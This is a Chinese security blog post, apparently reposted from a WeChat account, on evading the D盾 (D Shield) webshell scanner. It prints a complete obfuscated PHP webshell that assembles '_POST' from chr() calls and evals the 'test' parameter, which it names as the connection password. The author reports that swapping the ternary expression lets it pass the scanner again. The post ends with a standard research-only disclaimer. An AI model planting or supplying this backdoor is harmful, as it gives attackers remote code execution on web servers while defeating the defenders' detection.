0x00 正文
刚刚我连发了两条朋友圈:
先给大家看看我发了什么,这是第一条朋友圈:
这是第二条朋友圈:
没错,可能有读者朋友记得我在2月份时发过一篇eval过D盾通杀方案:
刚刚我突发奇想,我想看看这个方案现在还能不能过D盾,结果就如我第一条发的朋友圈一样,已经被杀了,不过不着急,我改了一下代码:
原始代码:
结果就是我第二条发的朋友圈,可以看到我只是把三元运算符中的表达式换了个位置就过了。
0x01 Code
连接密码依然为test:
classwwww{public function wwwww($str){return chr($str);}public function get($list){return $list['test'];}}$www = new wwww();$sfd = $www->wwwww(95);$sdf = $www->wwwww(80);$dfgb = $www->wwwww(79);$d123 = $www->wwwww(83);$d456 = $www->wwwww(84);$b = $sfd . $sdf . $dfgb . $d123 . $d456;eval(0 ? 0 : $www->get($$b));
发第一条朋友圈是因为在意料之中觉得搞笑就发了,第二条朋友圈是因为不在意料之中,实在是没想到,我以为也会被杀,所以笑得声音可能更大了些哈哈哈~
原文始发于微信公众号(Spade sec):PHP_webshell免杀05-再谈eval过D盾通杀方案
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论